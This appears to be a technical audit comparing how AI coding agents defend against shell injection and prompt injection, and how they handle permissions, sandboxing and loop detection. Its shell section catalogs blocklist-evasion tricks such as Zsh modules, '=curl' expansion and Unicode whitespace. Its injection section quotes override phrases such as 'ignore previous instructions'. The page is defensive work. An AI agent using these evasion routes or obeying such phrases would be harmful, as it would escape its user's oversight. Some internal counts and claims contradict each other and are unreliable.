The Security Audit: How Agents Defend Themselves
When you give an AI agent shell access to your machine, you're trusting it with enormous power. This page audits every security mechanism found across all 10 agents — from tree-sitter AST analysis to supply-chain verification.
Security spectrum overview
These agents span an enormous range of security investment. At one end, some agents treat shell access as a trusted operation with minimal guards. At the other, agents implement tree-sitter AST parsing, Zsh attack catalogs, quote-aware pipeline parsers, and binary provenance verification.
| Agent | Shell Security | Prompt Injection | Permissions | Sandboxing | Loop Detection |
|---|---|---|---|---|---|
| Claude Code | Tree-sitter AST + Zsh catalog | Feature-gated scanning | 4 modes + ML classifier + wildcard rules | Optional sandbox routing | State machine transitions |
| Neovate | 22-item ban list + quote-aware parser | — | 3 approval modes | — | — |
| Codex | execpolicy crate + is_known_safe_command() | — | request_permissions tool + config.toml overrides | Seatbelt/bwrap/restricted tokens | — |
| Hermes | Tirith binary + cosign provenance | Context + memory scanning | Child agent tool stripping | 6 backends incl. Docker | Trajectory tracking |
| Crush | Product-level permission gates | — | TUI permission prompts | — | SHA-256 signature hashing |
| DeerFlow | Guardrail middleware | — | Tool group filtering | Docker/Local/K8s | 200-line bucketing |
| OpenHands | Risk-level attributes | Security risk assessment template | RISK_LEVELS dict | Docker per-session | Temperature bumping |
| Qwen Code | Read-only detection + classification | — | Permission decisions | — | LoopDetected event type |
| Pochi | Foreground/background separation | — | Apply-diff safety params | — | Exponential backoff retry |
| Kimi CLI | Protocol-aware terminal | — | Hooks-based interception | — | — |
| Mux | Workspace isolation | — | Regex tool allow/deny | 7 runtime backends | — |
| Pi Mono | Extension-based only | — | Via extensions only | Container-recommended (user's responsibility) | — |
| Dirac | DIRAC_COMMAND_PERMISSIONS glob patterns | — | Approval-based workflow + YOLO mode (auto-approve) | Git checkpoints (revert before risky ops) | Exponential backoff (2s, 4s, 8s) |
Shell injection defense: the full spectrum
1. Claude Code — Tree-sitter AST analysis (23-point validation)
Claude Code's bashSecurity.ts is the deepest shell security
implementation in this set. It imports tree-sitter's shell grammar to parse
command ASTs before execution — operating on the actual parsed structure,
not regex approximations.
| Attack Vector | What It Does | Detection Method |
|---|---|---|
zmodload | Loads Zsh modules (zsh/system for raw FD access, zsh/net/tcp for sockets) | Command prefix match via Set (O(1)) |
emulate -c 'code' | Evaluate code in emulated environment — effectively eval | Flag pattern match |
sysopen/sysread/syswrite | Low-level FD ops from zsh/system module bypassing normal I/O | Command name match |
=cmd (EQUALS expansion) | =curl → /usr/bin/curl, bypassing blocklists | AST token shape detection |
<() / >() / =() | Process substitution creates FIFOs that execute as arguments | AST subtree match |
$() / backticks | Command substitution — detected via tree-sitter, not regex | AST node type |
zpty | Zsh pseudo-terminal module for interactive command automation | Command prefix match |
zsocket | Zsh socket module for network connections | Command prefix match |
zf_* | Zsh filesystem primitives (zf_mv, zf_rm, zf_mkdir, etc.) | Command prefix wildcard |
| Hereditary substitution | $\(.*<< — heredoc-in-substitution attacks | Regex + AST cross-check |
<# | PowerShell-style comment — flags context confusion | Token match ("defense in depth against future changes") |
| IFS injection | Manipulating Internal Field Separator to split commands differently | Environment variable scanning |
| Unicode whitespace | Zero-width or unusual Unicode space characters bypassing blocklists | Unicode character detection |
| Control characters | Hidden control chars in command strings | Control character detection |
| Quote manipulation | Misformed quotes breaking parser assumptions | Malformed token detection |
| Heredoc injection | Injecting commands via heredoc delimiters | Heredoc parsing + validation |
| Git commit substitution | Attacks via git commit message templates | Git-specific validation |
The ZSH_DANGEROUS_COMMANDS constant is a JavaScript
Set for O(1) lookup. The code comments explicitly state
"defense in depth against future changes" — this is security engineering
that anticipates novel attack vectors that don't exist yet.
2. Neovate Code — 22-item banned list + quote-aware pipeline parser
Neovate's src/tools/bash.ts uses a character-level state
machine to handle quoting correctly before any security check. This matters
because naive regex approaches fail on quoted strings:
// State machine tracks: inSingleQuote, inDoubleQuote, escaping
// splitPipelineSegments() respects quoting so 'echo "a|b"' is ONE segment
// hasCommandSubstitution() tracks same states to find $() and backticks
The full banned command list (22 items):
alias, aria2c, axel, bash, chrome, curl, curlie, eval,
firefox, fish, http-prompt, httpie, links, lynx, nc,
rm, safari, sh, source, telnet, w3m, wget, xh, zsh
Beyond static bans, it detects high-risk patterns like rm -rf,
sudo, dd if=, mkfs, and
curl | sh, checking every pipeline segment individually.
3. Codex — execpolicy rule DSL + safe command allowlist
Codex implements shell security through its execpolicy crate,
which provides a rule DSL for fine-grained command control. The policy system
supports prefix patterns, network rules, and command whitelists/blacklists.
A fast-path is_known_safe_command() allowlist short-circuits
common read-only operations like ls, cat, and
find without hitting the full policy engine.
Sandboxing varies by platform: macOS uses Seatbelt
(sandbox-exec) with a workspace-write profile
that keeps .git and .codex read-only;
Linux uses bubblewrap (prefers system bwrap,
vendored Landlock fallback); Windows uses restricted
tokens with split-filesystem policies. The CLI exposes
codex sandbox {macos,linux,windows} for testing, plus a
--sandbox flag with levels: read-only,
workspace-write, and danger-full-access.
The shell backend uses zsh-fork on macOS for safe shell
spawning, with classic Unix escalation elsewhere. Permission escalation
flows through the request_permissions tool with a runtime
approval flow, and MCP tool approvals can be overridden per-tool in
config.toml. The codebase enforces strict clippy denies
across 70+ crates: unwrap_used, expect_used,
needless_borrow, and more.
4. Hermes — Supply-chain verification via Tirith + cosign
Hermes takes a completely different approach: rather than blocking specific commands, it verifies the execution environment. The Tirith security binary is downloaded from GitHub releases with SHA-256 hash verification and optional cosign provenance validation.
This is supply-chain security — verifying that the execution binary is authentic and untampered — not just command blocking. The Tirith binary checks for:
- Homograph URLs (lookalike domains for phishing)
- Pipe-to-interpreter patterns
- Terminal injection attempts
4. Crush — TUI permission gates + SHA-256 loop detection
Crush integrates a permission system directly into its TUI. Before executing dangerous operations, the user sees a permission prompt. This is a UX-level defense — appropriate for an interactive tool where the user is present.
The SHA-256 loop detection in internal/agent/loop_detection.go
computes a signature by hashing tool_name + "\x00" + input + "\x00" + output
for every tool call. If any signature appears more than 5 times in the last
10 steps, the agent halts.
Prompt injection defense
Prompt injection — tricking the agent via crafted input in files, context, or memory — is a growing attack vector. Only two agents in this set have explicit defense:
Hermes — Two-layer injection scanning
Layer 1: Context file scanning — Before injecting context files (AGENTS.md, .cursorrules, SOUL.md) into the system prompt, Hermes scans for:
- "ignore previous instructions" / "system prompt override"
- "do not tell the user" (deception instructions)
- "act as if you have no restrictions" (bypass attempts)
<!-- ignore -->(hidden HTML comment injection)- Zero-width spaces and bidi override characters
- Credential exfiltration via
curlon.env
Layer 2: Memory injection scanning — MEMORY.md and USER.md go through the same scanner before loading. This matters because memory persists across sessions — a successful injection in session A would propagate to session B without this scan.
OpenHands — Security risk assessment template
OpenHands includes a composable Jinja2 sub-template
security_risk_assessment.j2 that's included in the main
system prompt. All tool calls carry a security_risk
attribute validated against a RISK_LEVELS dictionary.
This is more of a risk-classification system than an injection defense, but it provides auditability: every action is classified and the agent is explicitly warned about security risk in its system prompt.
Permission systems compared
How agents decide whether to run a command is a fundamental security question. The approaches vary dramatically:
| Agent | Permission Model | Granularity |
|---|---|---|
| Claude Code | 4 modes: default (prompt), plan (show plan, ask once), bypassPermissions (auto-approve), auto (ML classifier) | Per-operation + wildcard rules: Bash(git *), FileEdit(/src/*) |
| Neovate | 3 modes: default (prompt), autoEdit (auto-approve edits), yolo (approve all) | Per-tool category: read, write, command, network, ask |
| Codex | request_permissions tool with runtime approval flow + per-tool config.toml overrides | execpolicy rule DSL: prefix patterns, network rules, command whitelists/blacklists |
| Crush | TUI permission prompts before dangerous operations | Per-operation, user-present |
| DeerFlow | Tool group filtering + guardrail middleware (fail-closed by default) | Per-tool-group: web, file:read, file:write, bash |
| Mux | Regex tool allow/deny patterns per agent | Per-agent, regex-based: -.*, -file_edit_.* |
| Qwen Code | Permission decisions and shell classification | Per-tool, read-only detection |
| Hermes | Child agent tool stripping (5 tools always removed from children) | Per-agent-type: parent vs child |
Sandboxing and execution isolation
When things go wrong, how contained is the damage? The agents fall into three camps:
Strong isolation (Docker/container-based)
- OpenHands — Docker container per session, torn down on exit
- DeerFlow — AioSandboxProvider with Docker, Apple Container, or K8s backends
- Hermes — 6 backends: local, Docker, SSH, Daytona, Modal, Singularity
Moderate isolation (workspace/runtime-based)
- Mux — 7 runtime backends including devcontainer, Docker, worktree, SSH, remote
- Claude Code — Optional sandbox routing, git worktree isolation
- Codex — Platform sandboxes: macOS Seatbelt, Linux bwrap/Landlock, Windows restricted tokens
Host execution (permission-based guards only)
- Neovate — Host execution with approval gates and banned command lists
- Crush — Host execution with TUI permission prompts
- Qwen Code — Host execution with classification
- Pochi — Host execution with foreground/background separation
- Kimi CLI — Host execution with protocol-aware handling
- Pi Mono — Host execution with no built-in guards. The README explicitly states: "No permission popups. Run in a container, or build your own confirmation flow with extensions."
Loop detection as a safety mechanism
Infinite loops aren't just annoying — they can burn through API credits, fill disks with logs, or repeatedly execute destructive commands. Only three agents have explicit loop detection; the rest (including Pi Mono, Claude Code, and Mux) rely on the model to notice repetition or on max-iteration caps.
| Agent | Method | Threshold | Action |
|---|---|---|---|
| Crush | SHA-256(tool_name + input + output) over last 10 steps | >5 repeats in 10-step window | Halt agent as stuck |
| DeerFlow | Hash with 200-line bucketing for read_file, full arg hash for write/str_replace | 3 warns, 5 hard stop | Warn at 3, strip tool_calls at 5 (forces text output) |
| Hermes | Trajectory tracking + summary convergence detection | Diminishing new information | RL training signal; proxy for being stuck |
Why Crush's approach is the most robust
Crushing calling the same tool with different arguments gets a different hash. Calling it with the same arguments but getting different output (e.g., flaky command) also gets a different hash. Only genuine repetition triggers the halt. This avoids false positives from legitimate iterative workflows like "read file, edit, read again to verify."
Security verdicts
🏆 Best shell security: Claude Code
Tree-sitter AST parsing, 23-point Zsh attack catalog, O(1) Set lookups, and explicit "defense in depth against future changes" comments. This is security engineering that anticipates attack vectors that don't exist yet.
🏆 Best pre-execution safety: Neovate Code
22-item banned list, quote-aware pipeline parser, high-risk pattern detection per pipeline segment. The most opinionated bash safety in this set — stops dangerous commands before they ever run.
🏆 Best supply-chain security: Hermes
SHA-256 binary verification + cosign provenance attestation. This is the only agent that verifies the execution binary's authenticity and integrity before running.
🏆 Best execution isolation: OpenHands
Docker container per session is the strongest isolation model in this set. The agent runs inside a container, not on your host machine. Files sync back, but processes can't escape.
🏆 Best prompt injection defense: Hermes
Two-layer scanning (context files + memory) with 6+ pattern categories. The memory layer is critical: it prevents cross-session injection propagation.
🏆 Best loop detection: Crush
SHA-256 signature hashing over tool_name + input + output with a 10-step sliding window. No false positives from legitimate iterative workflows.
What most agents are missing
Several security patterns appear in only one or two agents despite being broadly applicable:
- Prompt injection scanning — Only Hermes does this explicitly. Every other agent (including Pi Mono, Claude Code, and Qwen Code) trusts context files blindly.
- Cross-session memory scanning — Only Hermes scans memory on load to prevent injection propagation.
- Supply-chain verification — Only Hermes verifies binary provenance.
- Tree-sitter AST parsing — Only Claude Code parses shell commands structurally rather than with regex.
- Quote-aware parsing — Only Neovate correctly handles quoting in pipeline segmentation.
- Temperature-adaptive retry — Only OpenHands bumps temperature on deterministic failures.
- Agent-requested compression — Only OpenHands lets the agent ask for context condensation.
- File mutation queues — Only Pi Mono serializes concurrent writes to the same file, preventing a subtle race condition that affects most other agents.
- Diff. TUI rendering — Only Pi Mono redraws only changed terminal cells, reducing attack surface from terminal escape sequence flooding.
Bottom line
The hallmark of a production-ready coding agent is not its prompt engineering, but its deterministic security scaffold. Claude Code and OpenHands represent the bleeding edge of different philosophies: Claude builds walls around the host machine, OpenHands isolates in containers.
Meanwhile, several agents (Pochi, Kimi CLI, Mux) rely primarily on trust and approval workflows rather than active defense mechanisms. This isn't necessarily wrong — for trusted environments, minimal friction is a feature — but it matters enormously when deploying agents on production infrastructure.